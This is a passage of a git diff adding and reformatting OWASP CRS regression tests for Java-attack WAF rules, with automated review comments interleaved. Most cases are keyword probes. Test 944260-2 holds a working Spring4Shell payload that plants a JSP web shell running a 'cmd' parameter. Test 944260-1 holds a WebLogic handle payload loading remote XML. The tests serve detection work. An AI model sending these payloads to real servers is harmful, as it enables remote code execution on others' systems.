"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-18 + desc: "XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-19 + desc: "Nested XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-20 + desc: "Content-Type text/plain includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id 
\"944250\"" + - test_title: 944250-21 + desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-22 + desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log_contains: "id \"944250\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml new file mode 100644 index 0000000000..664061d104 --- /dev/null +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml 
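Review bot: The test_title identifiers shift by one across the whole file (944250-0 … 944250-21 on the old side become 944250-1 … 944250-22 on the new side), so any external reference to a case by ID — a CI quarantine or skip list, a tracking issue — now points at a different payload; if such lists exist in the repository they should move in the same change, or the renumbering should be called out in the commit message. Separately, the cases described as "XML attribute value includes keyword …" (944250-6 and 944250-17) carry a body that reads here as plain `element_value`, which does not contain the keyword at all; this is probably XML markup stripped in rendering, but if the committed payload really has no `attribute_name="java.evil.runtime"`-style attribute those cases exercise nothing and would fail, so it is worth confirming against the file itself. The remainder of the hunk is re-indentation, the dropped `Accept-Charset` header and the `User-Agent` rename, none of which raises a concern.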
@@ -0,0 +1,39 @@
+---
+meta:
+ author: "theMiddle"
+ enabled: true
+ name: "944260.yaml"
+ description: "Positive tests for rule 944260"
+tests:
+ - test_title: 944260-1
+ desc: "CVE-2022-22963"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.1"
+ data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')"
+ output:
+ log_contains: "id \"944260\""
+ - test_title: 944260-2
+ desc: "Spring Framework RCE"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.1"
+ data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
+ output:
+ log_contains: "id \"944260\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
index 2b1f6b6332..4106730f76 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
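Review bot: The `desc` of test 944260-1 is `"CVE-2022-22963"`, but the request body it sends (`_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(...)`) looks like a WebLogic console `handle` parameter vector rather than the Spring Cloud Function SpEL header vector that CVE identifier usually denotes, so the description appears not to match what the test exercises; please check it against the rule's own reference and describe the vector the payload actually carries. Test 944260-2's `desc: "Spring Framework RCE"` is too vague to tell a future maintainer which technique is covered; the `class.module.classLoader.resources.context.parent.pipeline.first.*` body is a property-binding/class-loader manipulation and a desc such as `"Spring Framework class.module.classLoader property binding"` would make the coverage self-explanatory. Both tests also use `version: "HTTP/1.1"` while the neighbouring 944250 tests in this commit use `"HTTP/1.0"`; keeping the request template uniform across the 944xxx series ensures differences in rule behaviour are attributable to the payload rather than to the transport.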
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml 
@@ -1,7657 +1,6367 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944300.yaml" - description: "Positive tests for rule 944300" - tests: - - - test_title: 944300-0 - desc: "Argument test includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-1 - desc: "Argument name includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-2 - desc: "Cookie test includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id 
\"944300\"" - - - - test_title: 944300-3 - desc: "Cookie name includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-4 - desc: "Request header test includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-5 - desc: "XML attribute value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-6 - desc: "XML element value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-7 - desc: "Nested XML element value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-8 - desc: "Content-Type text/plain includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-9 - desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-10 - desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-11 - desc: "Argument test includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-12 - desc: "Argument name includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-13 - desc: "Cookie test includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-14 - desc: "Cookie name includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-15 - desc: "Request header test includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-16 - desc: "XML attribute value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-17 - desc: "XML element value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-18 - desc: "Nested XML element value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-19 - 
desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-20 - desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-21 - desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-22 - desc: "Argument test includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-23 - desc: "Argument name includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-24 - desc: "Cookie test includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-25 - desc: "Cookie name includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-26 - desc: "Request header test includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-27 - desc: "XML attribute value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-28 - desc: "XML element value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-29 - desc: "Nested XML element value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-30 - desc: "Content-Type text/plain includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-31 - desc: "Content-Type application/json arg value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - 
data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-32 - desc: "Content-Type application/json arg name includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-33 - desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-34 - desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 